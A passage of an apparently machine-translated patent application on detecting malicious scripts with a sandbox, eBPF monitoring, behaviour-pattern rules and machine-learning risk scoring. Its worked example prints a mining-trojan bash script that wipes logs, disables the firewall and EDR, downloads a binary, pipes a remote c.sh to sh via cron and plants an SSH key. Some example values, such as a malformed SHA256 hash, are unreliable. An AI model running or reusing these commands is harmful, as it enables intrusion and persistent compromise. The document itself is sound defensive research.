In this embodiment, eBPF programs need to be attached to file operation hooks such as vfs_write (write file) and vfs_read (read file), and file operation events are generated by monitoring the script's file read/write operations through the file system. A file operation event includes the path of the file read or written by the target script, the operation type, the hash value of the file content, and so on. File read/write operations may specifically be monitored through inotify, and the operation types include CREATE, DELETE, and the like. Conditions for acquiring the operation events can also be set, for example, only recording file operations that involve a sensitive directory (such as /etc or /var) or a specific file extension, which filters out a large number of benign events.
1.4, Acquiring a process management event;
In this embodiment, a process monitoring tool is required to periodically record the changes in the process tree generated during script execution and generate process management events. These events include the creation and termination of child processes, recording the PID (Process Identifier), parent-child relationship, and start command of each process. For example, if the script spawns a large number of child processes and these processes match known mining process characteristics, suspicion increases. The monitoring tool may be ps, pstree, and the like, and the condition for acquiring a process management event may be set as: the new process inherits the process ID or user ID of the suspicious script.
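Only as a heavily simplified illustration of the system-call capture in 1.1 (not the embodiment's actual eBPF program), a BCC-based Python probe for execve might look like the following; production probes would also cover the file, network, and process hooks described above and use structured event maps rather than the trace pipe.
Python
from bcc import BPF

# Kernel-side program: log each execve() call (skeleton only).
BPF_PROGRAM = r"""
#include <uapi/linux/ptrace.h>

int trace_execve(struct pt_regs *ctx) {
    bpf_trace_printk("execve, pid %d\n", bpf_get_current_pid_tgid() >> 32);
    return 0;
}
"""

b = BPF(text=BPF_PROGRAM)
b.attach_kprobe(event=b.get_syscall_fnname("execve"), fn_name="trace_execve")

# User-side loop: read the captured events from the kernel trace pipe.
while True:
    try:
        print(b.trace_fields())
    except KeyboardInterrupt:
        break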
In this embodiment, when a dynamic analysis result is generated according to an operation event, a malicious operation behavior of the operation event may be specifically identified by the following manner:
2.1, identifying malicious operation behaviors in the operation event.
In the present embodiment, the malicious operation behavior is a typical malicious operation performed in the execution process of the malicious script, such as log deletion, SSH key operation, and the like. These actions are accomplished by analyzing the captured system call events and related events and matching them to known malicious patterns. In this embodiment, the malicious operation behavior may include log deletion behavior, firewall disabling attempt behavior, user deletion behavior, suspicious software uninstallation behavior, external file download behavior, timed task modification behavior, SSH key operation behavior, and the like.
Specifically, when identifying log deletion behavior, deletions of files related to the system log need to be monitored; file deletion system calls are traced through eBPF, and the recognition parameters are: an unlink or unlinkat call is matched and the path of the target file contains /var/log. When identifying firewall disabling attempts, system calls that modify the iptables and ufw configuration need to be captured and the relevant command line parameters extracted, such as iptables -F; the recognition parameter is capturing system calls containing the iptables or ufw keywords. When identifying user deletion behavior, system calls related to user management, such as userdel, must be monitored and the user-deletion parameters in the command line extracted, for example by capturing system calls containing userdel or deluser. When identifying suspicious software uninstallation behavior, system calls that execute a software package manager (such as apt-get remove and yum remove) need to be traced and the command line parameters checked for known security software; the recognition parameter is matching package manager command execution that involves security software packages.
When identifying external file download behavior, network activity and file write operations need to be captured, for example files downloaded through tools such as wget and curl, recording the download URL, file name, hash value, and so on; the recognition parameter is capturing the association between a network socket connection and a file write operation. When identifying timed task modification behavior, modifications to timed task files such as /etc/crontab and /var/spool/cron/crontabs need to be monitored, capturing system calls related to the timed task configuration files, such as open and write; the recognition parameter is matching system calls that access or modify cron-related files. When identifying SSH key operation behavior, read/write operations on files in the ~/.ssh/ directory need to be traced, capturing file operation system calls and recording paths related to SSH key files; the recognition parameter is matching file operation system calls that involve the .ssh directory.
2.2, Matching the operation event sequence in the sliding window with a malicious behavior pattern, and searching a first malicious operation behavior sequence with similarity exceeding a preset threshold value.
In this embodiment, the first malicious operation behavior sequence is identified by a context correlation analysis method. The contextual relevance analysis uses a sliding window technique to analyze the most recently occurring events in the time dimension, and by applying predefined behavior pattern matching rules, the system can detect complex malicious behavior patterns and compare them to known threats.
Specifically, before the context correlation analysis method is executed, a window size needs to be set first, for example, the last 100 system call events, the sequence and type of events in the sliding window are recorded for subsequent analysis, the window slides and updates each time a new event is captured, and old events are moved out of the window. When a first malicious operation behavior sequence is identified, a behavior pattern matching rule is firstly required to be set, the behavior pattern matching rule is a predefined rule combination, for example, an external file downloading mode, a timing task modifying mode and a firewall disabling mode, then event sequences in each sliding window are matched with malicious patterns in a rule base, when events in the sliding window match a certain rule, the event sequences are marked as potential threats, then similarity comparison is carried out on the current behavior sequence with the potential threats and the known threats, a similarity score is calculated, and when the score is higher than a certain threshold value, an alarm is triggered, and the current behavior sequence is used as the first malicious operation behavior sequence. In this embodiment, a similarity algorithm such as Jaccard may be used to compare the current behavior sequence with the known threat behavior patterns, and the similarity threshold is set to 0.7, so as to ensure a higher detection rate and a lower false alarm rate.
In this embodiment, when calculating the similarity between the current behavior sequence and the known threat, the extracted static and dynamic features may be specifically subjected to similarity matching with features in the known malicious sample library, and the similarity of the script may be evaluated by using a hash algorithm (e.g., MD5, SHA-256) or similarity calculation (e.g., jaccard similarity), so as to quantify the matching degree between the script and the known malicious sample.
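A minimal sketch of the sliding-window correlation and Jaccard comparison described above; it assumes the window holds flagged behaviour labels rather than raw events, and the pattern library below is an illustrative assumption.
Python
from collections import deque

WINDOW_SIZE = 100            # most recent events kept for correlation
SIMILARITY_THRESHOLD = 0.7   # similarity threshold mentioned in the text

# Known malicious behaviour patterns; labels and contents are assumptions.
KNOWN_PATTERNS = {
    "miner_install": {"download_external_file", "disable_firewall", "modify_cron"},
}

def jaccard(a, b):
    union = a | b
    return len(a & b) / len(union) if union else 0.0

class SlidingWindowMatcher:
    def __init__(self):
        # Window of recently observed behaviour labels; old entries fall out
        # automatically once the window is full.
        self.window = deque(maxlen=WINDOW_SIZE)

    def add_event(self, behavior_label):
        self.window.append(behavior_label)
        current = set(self.window)
        # Return every known pattern whose Jaccard similarity with the
        # current window content exceeds the threshold.
        return [name for name, pattern in KNOWN_PATTERNS.items()
                if jaccard(current, pattern) > SIMILARITY_THRESHOLD]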
And 2.3, searching a second malicious operation behavior sequence meeting a malicious time sequence mode according to the time interval of each operation event.
In this embodiment, the sequential logic rule in the malicious sequential pattern is mainly used to analyze the sequence and time interval of occurrence of malicious behaviors, and by analyzing the sequential relationship of the behaviors, the detection accuracy can be further improved.
Specifically, the sequential logic rule is a rule that sets a sequential relationship between critical actions, and when an event conforming to the sequential logic rule is detected, a second sequence of malicious operation actions is generated so as to perform a subsequent analysis process. In determining the timing relationship analysis, the time intervals between the behaviors are calculated using the event timestamps, and if the time intervals between the behaviors meet preset conditions, the time intervals are marked as potential threats, and the time interval threshold is set to be between 1 minute and 10 minutes. When judging whether the time sequence logic rule is met, the time sequence logic of system call, file operation and process tree change can be analyzed, and whether the behavior chain meets the characteristic of typical malicious activity in the time sequence logic rule or not can be judged, for example, the file is downloaded first and then executed, or the security software is closed first and then the file is tampered, and the like.
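A sketch of this timing check; the two-step pattern and its labels are assumptions, while the 1 to 10 minute gap follows the interval given above.
Python
# Illustrative sequential-logic rule: behaviours must occur in this order,
# with 1 to 10 minutes between consecutive steps.
SEQ_PATTERN = ["download_external_file", "execute_downloaded_file"]
MIN_GAP_S, MAX_GAP_S = 60, 600

def matches_sequence(events):
    # events: list of (timestamp_seconds, behavior_label) in capture order.
    idx, last_ts = 0, None
    for ts, label in events:
        if label != SEQ_PATTERN[idx]:
            continue
        if last_ts is not None and not (MIN_GAP_S <= ts - last_ts <= MAX_GAP_S):
            continue
        last_ts = ts
        idx += 1
        if idx == len(SEQ_PATTERN):
            return True   # a second malicious operation behavior sequence is found
    return False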
It should be noted that, after the malicious operation behavior, the first malicious operation behavior sequence and the second malicious operation behavior sequence in the dynamic analysis result are obtained in the present application, a behavior feature aggregation operation may also be executed. The behavior feature aggregation operation is to aggregate all captured malicious behavior events to generate a behavior time line. By analysis of the time line, a key sequence of actions can be identified and further decisions and responses made.
The method comprises the steps of generating a behavior time line, arranging all captured behaviors according to a time sequence, wherein the captured behaviors comprise malicious operation behaviors, malicious operation behaviors in a first malicious operation behavior sequence and a second malicious operation behavior sequence, taking event time stamps corresponding to the malicious operation behaviors as behavior occurrence time, and displaying the occurrence sequence of each behavior through the behavior time line. Of course, specific information of malicious operation behaviors can be displayed in the behavior time line, and the specific information not only comprises time stamps of corresponding events, but also comprises information such as event types, process IDs and the like. The application can analyze the behavior sequence in the behavior time line, and identify the behavior combination with high relevance, for example, when the behavior conforming to the malicious mode appears on the time line for a plurality of times, the system gives an alarm.
For example, the target script is a malicious mining script that first downloads an external executable file, then disables the firewall, and then modifies the timing tasks to run the mining program periodically. The process of detecting malicious operation behavior through the steps is as follows:
Event capture: the system captures that the script downloads an external file using wget and records the file path and hash value; next, it captures the script executing an iptables -F command to disable the firewall; finally, it detects a modification of the timed task file.
Behavior feature extraction: three malicious operation behaviors are identified, namely downloading an external file, disabling the firewall, and modifying the timed task.
Context correlation analysis: because the events in the sliding window match the predefined pattern matching rule of "external file download + firewall disabling + timed task modification", the behavior sequence of downloading an external file, disabling the firewall, and modifying the timed task is judged to be a malicious operation behavior sequence.
Sequential logic evaluation: the external file download, firewall disabling, and timed task modification are analyzed against the malicious sequential pattern, and it is determined that this behavior sequence also meets the ordering requirement and occurs within the specified time interval, so the behavior sequence is again determined to be a malicious operation behavior sequence.
In summary, the application utilizes eBPF mechanism to deeply monitor the system, captures the decryption and confusion processes of malicious scripts, monitors the key catalogue, file operation and network communication in real time, and ensures comprehensive behavior monitoring. In the dynamic identification process, the accurate detection of the malicious script is realized through the extraction and analysis of actions such as firewall disabling, log clearing, rebound shell, binary downloading, timed task implantation and the like.
Referring to fig. 3, fig. 3 is a flowchart of another method for detecting a malicious script according to an embodiment of the present application, where the method includes the following steps:
s301, acquiring a target script to be analyzed;
s302, performing text analysis on the target script to generate a static analysis result;
s303, running a target script through a sandbox container, acquiring an operation event of the target script in the running process, and generating a dynamic analysis result according to the operation event;
s304, extracting feature vectors from the static analysis result and the dynamic analysis result, and inputting the feature vectors into a machine learning model to obtain a first risk assessment result;
s305, determining high-risk behavior rules and suspicious behavior combination rules in the heuristic rule set;
S306, detecting a high-risk behavior rule matched with the malicious operation behavior, and determining a first matching score according to the weight score of the matched high-risk behavior rule;
s307, detecting suspicious behavior combination rules matched with the first malicious operation behavior sequence and the second malicious operation behavior sequence, and determining a second matching score according to the weight scores of the matched suspicious behavior combination rules;
S308, determining a total matching score according to the first matching score and the second matching score;
S309, obtaining a malicious probability score in the first risk assessment result and obtaining a total matching score in the second risk assessment result;
S310, calculating a comprehensive risk score by using the malicious probability score, the total matching score, the first weight coefficient of the malicious probability score and the second weight coefficient of the total matching score;
And S311, determining the risk assessment grade of the target script according to the comprehensive score.
In this embodiment, high-risk behaviors and suspicious behavior combinations can be matched from the dynamic analysis result through a heuristic rule set. The high-risk behavior rules define certain high-risk behaviors, such as deleting system logs and disabling security software, and each rule is also given a corresponding weight score; for example, the weight score for deleting the system log is 0.8 and the weight score for disabling security software is 0.7. If several high-risk behaviors are matched from the dynamic analysis result, the sum of their weight scores is taken as the first matching score.
The suspicious behavior combination rule defines a combination of several behaviors that together pose a potential threat; for example, a rule may define the combination "download and execute + timing task modification + network connection" as suspicious behavior. A weight score is defined for each behavior in the rule, for example 0.5 for downloading and executing an external file, 0.4 for modifying a timing task and 0.6 for connecting to an external IP, so if this suspicious behavior combination rule is matched in a malicious operation behavior sequence, the resulting second matching score is 1.5. The total matching score in this embodiment is the sum of the first matching score and the second matching score. Further, if the first risk assessment result is a malicious probability score obtained through the machine learning model, the comprehensive risk score can be calculated from the malicious probability score, the total matching score, the first weight coefficient of the malicious probability score and the second weight coefficient of the total matching score. When calculating the comprehensive risk score, if the total matching score is liable to be too high, a full-score coefficient of the total matching score can be set to normalize it, ensuring that all scores fall between 0 and 1.
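As a rough Python sketch of this scoring (the rule names and weights repeat the examples in this paragraph; everything else, including the function names, is illustrative):
# High-risk behavior rules: behavior name -> weight score
HIGH_RISK_RULES = {"delete_system_log": 0.8, "disable_security_software": 0.7}

# One suspicious behavior combination rule: member behavior -> weight score
SUSPICIOUS_COMBINATION = {"download_and_execute_external_file": 0.5,
                          "modify_timed_task": 0.4,
                          "connect_to_external_ip": 0.6}

def first_matching_score(observed):
    # Sum the weights of every matched high-risk behavior rule.
    return sum(w for name, w in HIGH_RISK_RULES.items() if name in observed)

def second_matching_score(sequence):
    # If the whole combination appears in the malicious behavior sequence, sum its weights.
    if all(name in sequence for name in SUSPICIOUS_COMBINATION):
        return sum(SUSPICIOUS_COMBINATION.values())
    return 0.0

observed = {"delete_system_log", "download_and_execute_external_file",
            "modify_timed_task", "connect_to_external_ip"}
total_matching_score = first_matching_score(observed) + second_matching_score(observed)
print(total_matching_score)  # 0.8 + 1.5 = 2.3 for this illustrative input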
For example, the target script is a malicious mining script that performs the following actions when running: downloading an external file and executing it, modifying timing tasks so that the malicious program runs periodically, and disabling the system firewall.
In this embodiment, when the first risk assessment result is obtained through a random forest model, the behavior features are extracted and expressed as a 500-dimensional vector, the random forest model classifies the feature vector, and a malicious probability score of 0.75 is output. When the behaviors are matched through the heuristic rule set, the malicious mining script is found to match the "download and execute an external file" rule with a score of 0.5, the "modify timing task" rule with a score of 0.4, and the "disable firewall" rule with a score of 0.7, so the total matching score is 0.5+0.4+0.7=1.6. If the first weight coefficient of the malicious probability score is set to 0.4, the second weight coefficient of the total matching score to 0.6 and the full-score coefficient of the total matching score to 2, the calculated comprehensive risk score is 0.4×0.75+0.6×1.6/2=0.78.
If the preset risk assessment grade standard is 0-0.3 for low risk, 0.3-0.7 for medium risk and 0.7-1.5 for high risk, the calculated comprehensive score of 0.78 falls within the high-risk range, so the risk assessment grade is high risk.
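The weighted combination and the grading described in this example can be written as a small Python helper; the coefficients and thresholds repeat the numbers above, and the function names are illustrative:
def comprehensive_risk_score(malicious_prob, total_match, w1=0.4, w2=0.6, full_score=2.0):
    # Weighted sum of the model score and the normalized rule-matching score.
    return w1 * malicious_prob + w2 * (total_match / full_score)

def risk_level(score):
    if score <= 0.3:
        return "low risk"
    if score <= 0.7:
        return "medium risk"
    return "high risk"

score = comprehensive_risk_score(0.75, 1.6)   # 0.4*0.75 + 0.6*0.8 = 0.78
print(round(score, 2), risk_level(score))     # 0.78 high risk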
Further, in this embodiment, after determining the comprehensive risk assessment result according to the first risk assessment result and the second risk assessment result, a risk assessment report may also be generated according to the basic information, the static analysis result, the dynamic analysis result, and the comprehensive risk assessment result of the target script.
Specifically, before generating a risk assessment report, data aggregation is needed: the results of all analysis stages are collected, the static analysis results and dynamic analysis results are integrated to generate a behavior summary and key findings, and a predefined JSON template structure is then used to fill in the data of each part. The data mainly comprises basic information of the target script (including its file hash, analysis time and the like), the static analysis results, the dynamic behavior analysis, the risk assessment results, a detailed behavior timeline and so on. Moreover, the present embodiment can also generate a behavior graph using the d3.js library and create a time-series chart using plotly.js. After the risk assessment report is generated, the complete report can be saved to a distributed storage system such as MinIO, and a report summary can be generated and pushed to subscribers through a message queue, which may be RabbitMQ.
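A condensed Python sketch of this aggregation step is given below; the field names follow the parts listed above, the input dictionaries are placeholders, and the storage and message-queue pushes are only indicated in comments because their client configuration depends on the deployment:
import json
import time

def build_report(script_info, static_result, dynamic_result, assessment):
    # Fill a predefined JSON template with the data of each analysis stage.
    report = {
        "basic_info": {"file_hash": script_info["sha256"],
                       "analysis_time": time.strftime("%Y-%m-%dT%H:%M:%S")},
        "static_analysis": static_result,
        "dynamic_behavior": dynamic_result,
        "risk_assessment": assessment,
        "behavior_timeline": dynamic_result.get("timeline", []),
    }
    return json.dumps(report, ensure_ascii=False, indent=2)

report_json = build_report(
    {"sha256": "<file hash>"},
    {"obfuscated_segments": 1},
    {"timeline": [{"t": 1.2, "event": "download_external_file"}]},
    {"score": 0.78, "level": "high risk"},
)
# The complete report would then be saved to distributed storage (e.g. MinIO),
# and a report summary pushed to subscribers through a message queue (e.g. RabbitMQ).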
Here, the present embodiment provides a complete embodiment of detecting malicious scripts:
1. Task receiving: a bash script file is received; in this embodiment, a mining Trojan horse script is taken as an example for explanation:
#!/bin/bash
rm -rf /var/log/syslog    # purge log
ufw disable    # shut down firewall
userdel vfinder    # remove EDR user
/usr/local/qcloud/YunJing/uninst.sh    # uninstall EDR
wget -O /salt-store http://416419.selcdn.ru/cdn/salt_storer    # download binary
echo "* * * * * $LDR http://217.8.117.37/c.sh | sh > /dev/null 2>&1"    # implant timing task
cat "$SSH_KEY_FILE" >> ~/.ssh/authorized_keys    # append SSH key
Wherein the task priority is set to "high" and the timeout time is set to 10 minutes.
2. Pretreatment:
Generating task ID f3a24d8b-7d1c-4e5a-9f8e-7f1e6b3a5c4d
Computing file SHA256 hash:
8f4e7d1c9b3a2f1e6b5a8c7d9f1e3b5a8c7d9f1e3b5a8c7d9f1e3b5a
File type identification: ASCII text executable
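For ease of understanding, the preprocessing step can be sketched in Python as follows; the chunked hashing and the shebang-based type check are simplifications assumed for the sketch:
import hashlib
import uuid

def preprocess(path):
    task_id = str(uuid.uuid4())  # e.g. f3a24d8b-7d1c-4e5a-...
    sha256 = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            sha256.update(chunk)
        f.seek(0)
        head = f.read(64)
    # Very rough type identification: a shebang plus printable bytes
    # is reported as "ASCII text executable".
    is_ascii_script = head.startswith(b"#!") and all(b < 128 for b in head)
    return {"task_id": task_id,
            "sha256": sha256.hexdigest(),
            "file_type": "ASCII text executable" if is_ascii_script else "unknown"}

print(preprocess("sample.sh"))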
3. Preparing a sandbox:
creation of Docker container based on Alpine Linux
Setting the container hostname to "srv-prod-01" and the IP address to "192.168.1.100"
Deploying eBPF probes, and setting monitoring points
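One possible way to prepare such a container uses the Docker SDK for Python; the image tag, the subnet and the network name are assumptions, and the eBPF probes are only indicated by a comment because they are attached on the host side:
import docker

client = docker.from_env()

# User-defined bridge network so the sandbox can be given the fixed IP from the example.
ipam = docker.types.IPAMConfig(
    pool_configs=[docker.types.IPAMPool(subnet="192.168.1.0/24")])
network = client.networks.create("sandbox-net", driver="bridge", ipam=ipam)

container = client.containers.run(
    "alpine:latest",          # Alpine Linux base image
    command="sleep infinity",
    hostname="srv-prod-01",   # disguise the sandbox as an ordinary production host
    detach=True,
)
network.connect(container, ipv4_address="192.168.1.100")

# eBPF probes (system call, file, network and process monitoring points) would be
# attached on the host at this point, before the target script is copied in and run.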
4. Script execution and monitoring:
4.1 Static analysis finds that the script contains a base64-encoded segment.
4.2 The script is executed with a bash interpreter, and eBPF captures the following key actions in real time:
a. Delete the /var/log/syslog file
b. Execute the ufw command, attempting to disable the firewall
c. Delete a user
d. Execute a script named "uninst.sh" in the /usr/local/qcloud/YunJing/ directory
e. Download a file using wget from the URL http://416419.selcdn.ru/cdn/salt_storer
f. Modify crontab, adding a new timing task
g. Append content to ~/.ssh/authorized_keys
5. Behavioral analysis and risk assessment:
5.1 extracting behavior characteristics including log deletion, firewall disabling attempts, user deletion, suspicious software uninstallation, external file download, timed task modification, SSH key operation
5.2 Applying a machine learning model: the extracted 500-dimensional feature vector is input, and the model outputs a malicious probability score of 0.92 (see the sketch after this list);
5.3, rule matching:
The log deletion rule is triggered with a score of 10, a second rule is triggered with a score of 8, and a third rule with a score of 15, giving a total rule matching score of 33 against a full score of 40;
5.4 Comprehensive risk score calculation: 0.4 × 0.92 + 0.6 × (33/40) = 0.368 + 0.495 = 0.863;
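Step 5.2 can be reproduced in Python with a hashed bag-of-behaviors vector and a pre-trained classifier; the feature hashing, the model file and its training are assumptions made for the sketch, since the embodiment does not specify the feature engineering:
import hashlib
import numpy as np
import joblib  # assumes a pre-trained scikit-learn random forest saved with joblib

FEATURE_DIM = 500

def behaviors_to_vector(behaviors):
    # Hash each behavior name into a fixed 500-dimensional count vector.
    vec = np.zeros(FEATURE_DIM)
    for name in behaviors:
        index = int(hashlib.md5(name.encode()).hexdigest(), 16) % FEATURE_DIM
        vec[index] += 1.0
    return vec.reshape(1, -1)

behaviors = ["log_deletion", "firewall_disable_attempt", "user_deletion",
             "suspicious_software_uninstall", "external_file_download",
             "timed_task_modification", "ssh_key_operation"]

model = joblib.load("rf_script_model.joblib")  # hypothetical model file
malicious_prob = model.predict_proba(behaviors_to_vector(behaviors))[0, 1]
# The probability (0.92 in the example) is then combined with the normalized
# rule-matching score 33/40 as in step 5.4: 0.4 * 0.92 + 0.6 * (33/40) = 0.863.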
6. reporting the results:
Generating a detailed report in a JSON format, wherein the detailed report comprises all analysis results;
Risk assessment conclusion: high risk (score 0.863);
Possible malicious intentions: cryptocurrency mining, persistent infection and detection evasion;
Suggested operations: immediately isolate the infected system, remove the malicious components and strengthen the system's security protection.
In summary, after the isolated running environment is created, a potentially malicious script can be run in that environment, and its behavior can be monitored and recorded during execution. In the dynamic analysis process, the accuracy and effectiveness of detection are improved by identifying and extracting actions such as firewall disabling, log clearing, reverse shells, binary downloading and timed-task implantation, and by issuing graded alarms in combination with a multi-feature decision mechanism. In this way, even previously unseen new malicious scripts can be effectively discovered. The scheme runs scripts in Docker containers, which gives the system a lightweight design, makes the whole detection process faster and occupies few system resources. The scheme also adopts a cloud-native architecture design and supports clustered deployment, so analysis capability can be expanded dynamically on demand, improving the scalability and flexibility of the system.
Referring to fig. 4, fig. 4 is a schematic structural diagram of a detection apparatus for malicious scripts according to an embodiment of the present application, where the apparatus specifically includes:
A first obtaining module 11, configured to obtain a target script to be analyzed;
the first analysis module 12 is used for performing text analysis on the target script and generating a static analysis result;
the second obtaining module 13 is configured to operate the target script through a sandbox container, and obtain an operation event of the target script in an operation process;
a second analysis module 14 for generating a dynamic analysis result according to the operation event;
The first evaluation module 15 is configured to extract a feature vector from the static analysis result and the dynamic analysis result, and input a machine learning model to obtain a first risk evaluation result;
a second evaluation module 16, configured to determine a second risk evaluation result by matching the operation behaviors in the dynamic analysis result through a heuristic rule set;
The result determining module 17 is configured to determine a comprehensive risk assessment result according to the first risk assessment result and the second risk assessment result.
As an optional embodiment, the first analysis module is specifically configured to perform text analysis on the target script, identify target code segments in the target script, and record code information and a position of each target code segment, where a type of the target code segment includes at least one of a confusion code segment, an encryption code segment, a command, a function, a character string, and a constant.
As an alternative embodiment, the second analysis module comprises:
the identification unit is used for identifying malicious operation behaviors in the operation event;
The first searching unit is used for matching the operation event sequence in the sliding window with the malicious behavior pattern and searching a first malicious operation behavior sequence with similarity exceeding a preset threshold value;
The second searching unit is used for searching a second malicious operation behavior sequence meeting the malicious time sequence mode according to the time interval of each operation event.
As an alternative embodiment, the second evaluation module comprises:
the first determining unit is used for determining high-risk behavior rules and suspicious behavior combination rules in the heuristic rule set;
the first detection unit is used for detecting a high-risk behavior rule matched with the malicious operation behavior and determining a first matching score according to the weight score of the matched high-risk behavior rule;
The second detection unit is used for detecting suspicious behavior combination rules matched with the first malicious operation behavior sequence and the second malicious operation behavior sequence, and determining a second matching score according to the weight scores of the matched suspicious behavior combination rules;
and the second determining unit is used for determining a total matching score according to the first matching score and the second matching score.
The second obtaining module is specifically configured to obtain, through an eBPF mechanism of the sandbox container, an operation event of the target script in the running process, where the operation event includes a system call event, a network activity event, a file operation event and a process management event.
As an alternative embodiment, the result determination module includes:
the acquisition unit is used for acquiring the malicious probability score in the first risk assessment result and acquiring the total matching score in the second risk assessment result;
the computing unit is used for computing a comprehensive risk score by using the malicious probability score, the total matching score, a first weight coefficient of the malicious probability score and a second weight coefficient of the total matching score;
and a third determining unit, configured to determine a risk assessment level of the target script according to the comprehensive score.
As an alternative embodiment, the device further comprises:
And the report generation module is used for generating a risk assessment report according to the basic information of the target script, the static analysis result, the dynamic analysis result and the comprehensive risk assessment result.
The specific manner in which the various modules perform operations in the apparatus of the above embodiments has been described in detail in the embodiments of the method and will not be described in detail here.
Referring to fig. 5, fig. 5 is a schematic structural diagram of an electronic device according to an embodiment of the present application, where the electronic device specifically includes:
The processor 21, the memory 22 and the computer program stored in the memory 22 and capable of running on the processor 21, the processor 21 executes the steps of the method for detecting a malicious script according to any of the above method embodiments through the computer program.
Processor 21 may include one or more processing cores, such as a 4-core processor, an 8-core processor, etc. The processor 21 may be implemented in at least one hardware form of DSP (Digital Signal Processing), FPGA (Field-Programmable Gate Array) or PLA (Programmable Logic Array). The processor 21 may also include a main processor and a coprocessor, where the main processor is a processor for processing data in a wake-up state, also called a CPU (Central Processing Unit), and the coprocessor is a low-power processor for processing data in a standby state. In some embodiments, the processor 21 may integrate a GPU (Graphics Processing Unit) for rendering and drawing the content to be displayed on the display screen. In some embodiments, the processor 21 may also include an AI (Artificial Intelligence) processor for processing computing operations related to machine learning.
Memory 22 may include one or more computer-readable storage media, which may be non-transitory. Memory 22 may also include high-speed random access memory, as well as non-volatile memory, such as one or more magnetic disk storage devices or flash memory storage devices. In this embodiment, the memory 22 is at least used for storing a computer program 221, which, after being loaded and executed by the processor 21, can implement the relevant steps in the method for detecting a malicious script disclosed in any of the foregoing embodiments. In addition, the resources stored in the memory 22 may further include an operating system 222, data 223, and the like, and the storage may be transient or permanent. The operating system 222 may include Windows, Unix, Linux, and the like.
In some embodiments, the electronic device may further include a display 23, an input-output interface 24, a communication interface 25, a sensor 26, a power supply 27, and a communication bus 28.
Of course, the structure of the electronic device shown in fig. 5 is not limited to the electronic device in the embodiment of the present application, and the electronic device may include more or fewer components than those shown in fig. 5 or may combine some components in practical applications.
In another exemplary embodiment, there is also provided a computer storage medium storing computer-executable instructions which, when executed by a processor, implement the steps of the method for detecting a malicious script according to any one of the method embodiments described above.
The storage medium may include a usb disk, a removable hard disk, a Read-Only Memory (ROM), a random access Memory (Random Access Memory, RAM), a magnetic disk, or an optical disk, etc. that may store the program code.
Alternatively, specific examples in this embodiment may refer to examples described in the foregoing embodiments, and this embodiment is not described herein.
It is to be understood that the terminology used herein is for the purpose of describing particular example embodiments only, and is not intended to be limiting. As used herein, the singular forms "a", "an" and "the" are intended to include the plural forms as well, unless the context clearly indicates otherwise. The terms "comprises," "comprising," "includes," "including," and "having" are inclusive and therefore specify the presence of stated features, steps, operations, elements, and/or components, but do not preclude the presence or addition of one or more other features, steps, operations, elements, components, and/or groups thereof. The method steps, processes, and operations described herein are not to be construed as necessarily requiring their performance in the particular order described or illustrated, unless an order of performance is explicitly stated. It should also be appreciated that additional or alternative steps may be used.
The foregoing is only a specific embodiment of the invention to enable those skilled in the art to understand or practice the invention. Various modifications to these embodiments will be readily apparent to those skilled in the art, and the generic principles defined herein may be applied to other embodiments without departing from the spirit or scope of the invention. Thus, the present invention is not intended to be limited to the embodiments shown herein but is to be accorded the widest scope consistent with the principles and novel features disclosed herein.

Claims (10)

1. The method for detecting the malicious script is characterized by comprising the following steps:
Acquiring a target script to be analyzed;
performing text analysis on the target script to generate a static analysis result;
operating the target script through a sandbox container, acquiring an operation event of the target script in the operation process, and generating a dynamic analysis result according to the operation event;
Extracting feature vectors from the static analysis result and the dynamic analysis result, and inputting a machine learning model to obtain a first risk assessment result;
Matching operation behaviors in the dynamic analysis result through a heuristic rule set, and determining a second risk assessment result;
and determining a comprehensive risk assessment result according to the first risk assessment result and the second risk assessment result.
2. The method of claim 1, wherein performing text analysis on the target script to generate a static analysis result comprises:
Performing text analysis on the target script, identifying target code segments in the target script, and recording code information and positions of each target code segment;
The object code segment comprises at least one of a confusion code segment, an encryption code segment, a command, a function, a character string and a constant.
3. The method of claim 1, wherein generating dynamic analysis results from the operational events comprises:
identifying malicious operation behaviors in the operation event;
matching the operation event sequence in the sliding window with a malicious behavior pattern, and searching a first malicious operation behavior sequence with similarity exceeding a preset threshold;
and searching a second malicious operation behavior sequence meeting the malicious time sequence mode according to the time interval of each operation event.
4. The method of claim 3, wherein the matching the operational behavior in the dynamic analysis result by the heuristic rule set, determining a second risk assessment result comprises:
Determining high-risk behavior rules and suspicious behavior combination rules in the heuristic rule set;
Detecting a high-risk behavior rule matched with the malicious operation behavior, and determining a first matching score according to the weight score of the matched high-risk behavior rule;
detecting suspicious behavior combination rules matched with the first malicious operation behavior sequence and the second malicious operation behavior sequence, and determining a second matching score according to the weight scores of the matched suspicious behavior combination rules;
and determining a total matching score according to the first matching score and the second matching score.
5. The method according to claim 1, wherein the obtaining the operation event of the target script in the running process includes:
And acquiring operation events of the target script in the running process through a eBPF mechanism of the sandbox container, wherein the operation events comprise a system call event, a network activity event, a file operation event and a process management event.
6. The method according to any one of claims 1 to 5, wherein the determining a comprehensive risk assessment result from the first risk assessment result and the second risk assessment result includes:
Obtaining a malicious probability score in the first risk assessment result and obtaining a total matching score in the second risk assessment result;
calculating a comprehensive risk score by using the malicious probability score, the total matching score, a first weight coefficient of the malicious probability score and a second weight coefficient of the total matching score;
and determining the risk assessment grade of the target script according to the comprehensive score.
7. The method according to claim 6, wherein after determining a comprehensive risk assessment result from the first risk assessment result and the second risk assessment result, further comprising:
and generating a risk assessment report according to the basic information of the target script, the static analysis result, the dynamic analysis result and the comprehensive risk assessment result.
8. A malicious script detection device, comprising:
The first acquisition module is used for acquiring a target script to be analyzed;
the first analysis module is used for carrying out text analysis on the target script and generating a static analysis result;
The second acquisition module is used for operating the target script through the sandbox container and acquiring an operation event of the target script in the operation process;
the second analysis module is used for generating a dynamic analysis result according to the operation event;
the first evaluation module is used for extracting feature vectors from the static analysis result and the dynamic analysis result, and inputting a machine learning model to obtain a first risk evaluation result;
the second evaluation module is used for matching the operation behaviors in the dynamic analysis results through a heuristic rule set to determine a second risk evaluation result;
and the result determining module is used for determining a comprehensive risk assessment result according to the first risk assessment result and the second risk assessment result.
9. An electronic device, comprising:
A processor, a memory and a computer program stored on the memory and executable on the processor, the processor executing the steps of the method for detecting a malicious script according to any one of the preceding claims 1 to 7 by means of the computer program.
10. A computer storage medium storing computer executable instructions for performing the steps of the method for detecting a malicious script according to any one of the preceding claims 1 to 7.
CN202411486314.7A 2024-10-23 2024-10-23 Malicious script detection method, device, equipment and storage medium Pending CN119397533A (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN202411486314.7A CN119397533A (en) 2024-10-23 2024-10-23 Malicious script detection method, device, equipment and storage medium

Applications Claiming Priority (1)

